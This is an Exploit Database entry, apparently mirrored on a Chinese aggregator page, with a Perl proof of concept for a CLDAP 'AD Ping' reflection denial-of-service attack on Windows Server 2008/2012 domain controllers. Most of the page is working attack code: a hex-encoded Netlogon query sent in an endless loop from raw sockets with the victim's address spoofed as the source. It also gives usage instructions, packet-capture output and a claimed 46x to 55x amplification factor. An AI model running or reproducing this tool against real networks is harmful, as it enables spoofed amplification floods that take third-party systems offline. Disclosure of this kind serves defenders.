Microsoft Windows Server 2008/2012 – LDAP RootDSE Netlogon Denial of Service

• Exploit Database
• 18 阅读

• 作者： Todor Donev
  日期： 2016-11-08
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40703/

• #!/usr/bin/perl
  #
  #MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon 
  #(CLDAP "AD Ping") query reflection DoS PoC
  #
  #Copyright 2016 (c) Todor Donev
  #Varna, Bulgaria
  #todor.donev@gmail.com
  #https://www.ethical-hacker.org/
  #https://www.facebook.com/ethicalhackerorg
  #http://pastebin.com/u/hackerscommunity 
  #
  #MS Windows Server 2016 [NOT TESTED !!!]
  # 
  #Description:
  #The attackersends a simple query to a vulnerable reflector 
  #supporting the Connectionless LDAP service (CLDAP) and using 
  #address spoofing makes it appear to originate from the intended 
  #victim. The CLDAP service responds to the spoofed address, 
  #sending unwanted network traffic to the attacker’s intended target.
  # 
  #Amplification techniques allow bad actors to intensify the size 
  #of their attacks, because the responses generated by the LDAP 
  #servers are much larger than the attacker’s queries. In this case, 
  #the LDAP service responses are capable of reaching very high 
  #bandwidth and we have seen an average amplification factor of 
  #46x and a peak of 55x.
  #
  #
  #Disclaimer:
  #This or previous program is for Educational purpose ONLY. Do not 
  #use it without permission. The usual disclaimer applies, especially 
  #the fact that Todor Donev is not liable for any damages caused by 
  #direct or indirect use of the information or functionality provided 
  #by these programs. The author or any Internet provider bears NO 
  #responsibility for content or misuse of these programs or any 
  #derivatives thereof. By using these programs you accept the fact
  #that any damage (dataloss, system crash, system compromise, etc.) 
  #caused by the use of these programs is not Todor Donev's 
  #responsibility.
  #
  #Use at your own risk and educational
  #purpose ONLY!
  #
  #See also, UDP-based Amplification Attacks:
  #https://www.us-cert.gov/ncas/alerts/TA14-017A
  #
  #
  ## perl cldapdrdos.pl 192.168.1.112 192.168.1.146
  #[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC
  #[ ======
  #[ Usg: cldapdrdos.pl <ldap server> <target> <port>
  #[ Default port: 389
  #[ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1
  #[ ======
  #[ <todor.donev@gmail.com> Todor Donev
  #[ Facebook: https://www.facebook.com/ethicalhackerorg
  #[ Website: https://www.ethical-hacker.org/
  #[ Sending CLDAP "AD Ping" packets..
  #^C
  ## tcpdump -i eth0 -c4 port 389
  #tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
  #listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
  #00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57
  #00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315## LOOOL...
  #00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57
  #00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315## LOOOL...
  #4 packets captured
  #6 packets received by filter
  #0 packets dropped by kernel
  #
  #
  #
  
  use Net::RawIP;
  
  print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n";
  print "[ ======\n";
  print "[ Usg: $0 <ldap server> <target> <port>\n";
  print "[ Default port: 389\n";
  print "[ Example: perl $0 192.168.30.56 192.168.1.1\n";
  print "[ ======\n";
  print "[ <todor.donev\@gmail.com> Todor Donev\n";
  print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
  print "[ Website: https://www.ethical-hacker.org/\n";
  
  my $cldap = $ARGV[0];
  my $target= $ARGV[1];
  my $port= $ARGV[2] || '389';
  
  die "[ Error: Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);
  
  my $query= "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a";
  $query.= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01";
  $query.= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65";
  $query.= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00";
  $query.= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e";
  $query.= "\x65\x74\x6c\x6f\x67\x6f\x6e";
   
  my $sock =new Net::RawIP({ udp => {} }) or die;
  print "[ Sending CLDAP \"AD Ping\" packets..\n";
  while () {
  select(undef, undef, undef, 0.40); # Sleep 400 milliseconds
  $sock->set({ip =>{ saddr=> $target, daddr => $cldap},
   udp =>{ source => 31337, dest=> $port, data => $query} });
  $sock->send;
  }